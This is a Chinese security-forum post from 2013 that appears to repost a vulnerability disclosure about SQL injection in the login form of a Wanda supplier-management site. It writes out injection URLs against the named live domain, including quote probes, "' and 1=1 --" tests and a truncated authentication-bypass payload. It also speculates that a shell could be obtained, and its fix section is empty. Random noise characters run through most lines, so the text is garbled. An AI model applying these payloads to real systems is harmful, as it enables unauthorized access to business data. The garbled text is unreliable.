找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3173|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。8 `7 J0 _+ R0 `- K' @6 h0 n
详细说明:8 _6 _  ]) z3 |8 P! u1 n6 l
万达scm系统登陆框sql注入。! p& f4 i6 W. L* @4 |# |
  Y4 V$ X3 C& g% {) k& b
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%271 `, {, P3 B/ ?3 X: M

, a( V- G7 m  ]4 h& S9 g. T; `
' H$ J2 ^/ s# Y7 `2 |8 \" q500错误。5 |  Y4 G9 E' L0 ]; Q3 }

! `; y- p+ J( I9 b) Y用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
  v9 V& y+ ]; rhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
0 n) N5 D' [: v" w1 _3 m# o& y& |截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
4 g) @$ r3 K9 t+ p9 t2 I% U! ~: @" J经过分析,登陆验证的过程应该是:& X* ]2 F$ O! h8 u6 d/ {/ H

& _+ O3 K6 w; R# Q取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。- {! V2 h/ C4 x; m  Y4 D
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png$ C* ^9 x8 u6 K- c7 n0 @$ s

. O6 M+ \. I5 \8 T/ zoracle数据库,存在注入点。@大连万达,你怎么看?/ p( `& m" G% a% p$ k7 F; W% ^% h
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
* ^% o# M4 N4 w( Y2 L/ C1 d7 H1 Y# U1 U
4 ], t( r6 E6 ?' Z0 l5 s系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。1 Y" }# b4 s* N; e( ]
漏洞证明:8 `, E, ?* S' A
万达scm系统登陆框sql注入。; l2 q0 [: i1 G8 w" n

$ c. r9 n% t; d9 Rhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27  {. U$ x6 M( \8 p' F& Q. B
) ^. m6 H1 [* v& r7 z- e

1 J5 O, I% k+ y; I8 E2 J& B500错误。+ u: S6 C8 {8 S( }$ i) K0 ~5 {$ a
- ]. [4 C0 B8 ~. R9 d( u7 ?9 ^
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
+ Z3 Y  Q6 Z5 R, T6 ^( rhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png3 R* Z" ]9 C2 \6 g" X# t
0 o- a/ f' {7 F9 z. T: Y5 b7 E
5 \5 }% s( V* V4 W+ q+ _
(截图有一点问题)
6 M* Q3 f6 U" M: \! x( ~( Z5 _9 @* ^; W' v! a
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
+ v8 k/ h" b: w, X+ r4 y2 |& D! T$ D: U' h  ~
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
+ ^5 ^: R: s9 K1 k
" q6 n- i: n& V9 N( R绕过:
, F" e( O% W7 a8 V+ U' Y: j7 Phttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
& V8 |( E' H& ]( |) l3 `& B9 X: \' a& `5 o1 N6 ^/ U, N

  |7 X2 d2 p, Goracle数据库,存在注入点。@大连万达,你怎么看?
! V6 ~3 ^1 w* y& L( ]% [* p& y​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。) I+ z8 l7 T! Y8 C
6 o$ R1 g% s& G
修复方案:% Y2 t& D6 e% @, ?
。。。
+ U+ }  O/ `8 e+ y: Q5 ~
" @4 m' @$ @% \, Q1 o5 z' q' [$ K- ?4 b% I; U% }( ~
厂商已经确认% T5 N9 b7 [6 e

8 ~( ^) ^. ]& J: ^0 w" ~$ a0 {[/td][/tr]
6 N; ]; z  m4 H% k[/table]/ ^" c+ [3 F, I' ^

* t' Q7 x- l9 S* g6 V$ G1 T+ `  m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表